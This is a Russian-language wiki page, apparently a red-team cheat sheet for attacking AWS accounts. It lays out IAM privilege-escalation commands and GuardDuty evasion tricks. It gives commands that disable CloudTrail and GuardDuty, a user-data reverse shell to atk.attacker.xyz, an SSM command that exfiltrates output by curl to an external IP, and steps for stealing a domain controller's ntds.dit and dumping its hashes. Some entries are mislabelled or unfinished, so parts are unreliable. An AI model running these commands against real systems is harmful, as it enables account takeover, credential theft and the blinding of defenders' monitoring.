http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

==== iam:PutRolePolicy ====

Создать или обновить inline-политику для роли.

==== iam:PutGroupPolicy ====

Создать или обновить inline-политику для группы.

==== iam:PuserUserPolicy ====

Создать или обновить inline-политику.

==== iam:UpdateAssumeRolePolicy + sts:AssumeRole ====

Обновить документ "AssumeRolePolicyDocument" для роли.

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

==== iam:AttachUserPolicy ====

Позволяет прикрепить политику к пользователю. Если существует политика, дающая админские права - повышение.

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Основное ===

Cognito отвечает за следующие действия:

* Регистрация пользователя (email + пароль)

* Авторизация пользователя

* Работа с сохраненной пользовательской информацией (устанавливается приложением)

* Специальные действия (например, предоставление AWS-ключей)

Все общение идет по HTTP(s). Особенность системы в том, что Cognito общается как напрямую с чужим веб-сайтом, так и напрямую с клиентским браузером. То есть веб-сервер не знает, какой был передан пароль (в нормальной реализации).

Пример URL: cognito-identity.us-east-1.amazonaws.com

За действие отвечает HTTP-заголовок "X-Amz-Target". В своем роде, это Endpoints API.

Какие параметры требуются для работы с ним:

1. Название Endpoint'а - "X-Amz-Target" заголовок

2. Регион - "aws_project_region" параметр

3. Session token - позже требуется для запросов.

4. Identity Pool ID - нужен для запросов типа Identity Pools.

Также пишут, что Cognito разделяется на две основные части:

* User Pools - для тех, кому нужна только регистрация и аутентификация

* Identity Pools - для тех, кому еще и нужен доступ к AWS-ресурсам.

=== X-Amz-Target (Endpoints) ===

==== AWSCognitoIdentityService.UpdateUserAttributes ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

Также раньше можно было менять поле email'а пользователя (0day): https://infosecwriteups.com/hacking-aws-cognito-misconfiguration-to-zero-click-account-takeover-36a209a0bd8a

Важно! Указано, что могут быть отправки СМС-уведомлений, так что тестировать осторожно.

P.S. Мб неверно название Endpoint'а. Надо проверять.

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Позволяет получить AWS ключи для работы с AWS-консолью. По-умолчанию отключено.

Требуется aws_identity_pool_id.

В некоторых примерах оно также было указано как "com.amazonaws.cognito.identity.model.AWSCognitoIdentityService.GetCredentialsForIdentity"

Подробнее тут: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

==== AWSCognitoIdentityService.GetOpenIdToken ====

Позволяет получить OpenID токен, действительный на 10 минут.

В примере требуется только "IdentityID"

==== AWSCognitoIdentityService.GetOpenIdTokenForDeveloperIdentity ====

Тоже позволяет получить OpenID токен, действительный на 10 минут. Но также создает новый "IdentityID" (если он не был указан).

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Получить учетные данные пользователя по IdentityID: SecretKey, SessionToken, AccessKeyID.

https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

